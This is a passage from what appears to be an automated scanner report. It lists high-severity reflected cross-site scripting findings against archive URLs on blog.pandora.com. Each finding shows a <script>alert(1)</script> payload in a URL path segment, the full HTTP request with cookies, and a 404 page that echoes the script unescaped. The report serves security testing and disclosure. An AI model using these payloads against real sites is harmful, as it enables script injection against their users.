Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79994<script>alert(1)</script>e7a8e90b39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ was not found on this server.</p>
...[SNIP]...

3.28. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8db7f<script>alert(1)</script>1733790e5e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ was not found on this server.</p>
...[SNIP]...

3.29. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3b98<script>alert(1)</script>f3dc42bdead was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ was not found on this server.</p>
...[SNIP]...

3.30. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f14e<script>alert(1)</script>8a7f5560974 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ was not found on this server.</p>
...[SNIP]...

3.31. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85944<script>alert(1)</script>d8b652c75fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ was not found on this server.</p>
...[SNIP]...

3.32. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b19b6<script>alert(1)</script>a2e5dc60e78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ was not found on this server.</p>
...[SNIP]...

3.33. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73e85<script>alert(1)</script>ab709179510 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ was not found on this server.</p>
...[SNIP]...

3.34. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52080<script>alert(1)</script>69601ecbd83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ was not found on this server.</p>
...[SNIP]...

3.35. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1a55<script>alert(1)</script>2930f5de171 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ was not found on this server.</p>
...[SNIP]...

3.36. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f891c<script>alert(1)</script>910256c07c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ was not found on this server.</p>
...[SNIP]...

3.37. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 812a3<script>alert(1)</script>4963365f5f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ was not found on this server.</p>
...[SNIP]...

3.38. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb8f3<script>alert(1)</script>2960d34c74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ was not found on this server.</p>
...[SNIP]...

3.39. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97499<script>alert(1)</script>74af091ba5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ was not found on this server.</p>
...[SNIP]...

3.40. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6250<script>alert(1)</script>f5b95efae30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ was not found on this server.</p>
...[SNIP]...

3.41. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 176cf<script>alert(1)</script>b4e0ebb55d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ was not found on this server.</p>
...[SNIP]...

3.42. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4d2d<script>alert(1)</script>1fffc06b069 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ was not found on this server.</p>
...[SNIP]...

3.43. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5cfe<script>alert(1)</script>3585d67671d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ was not found on this server.</p>
...[SNIP]...

3.44. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86220<script>alert(1)</script>bfa750f2e3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

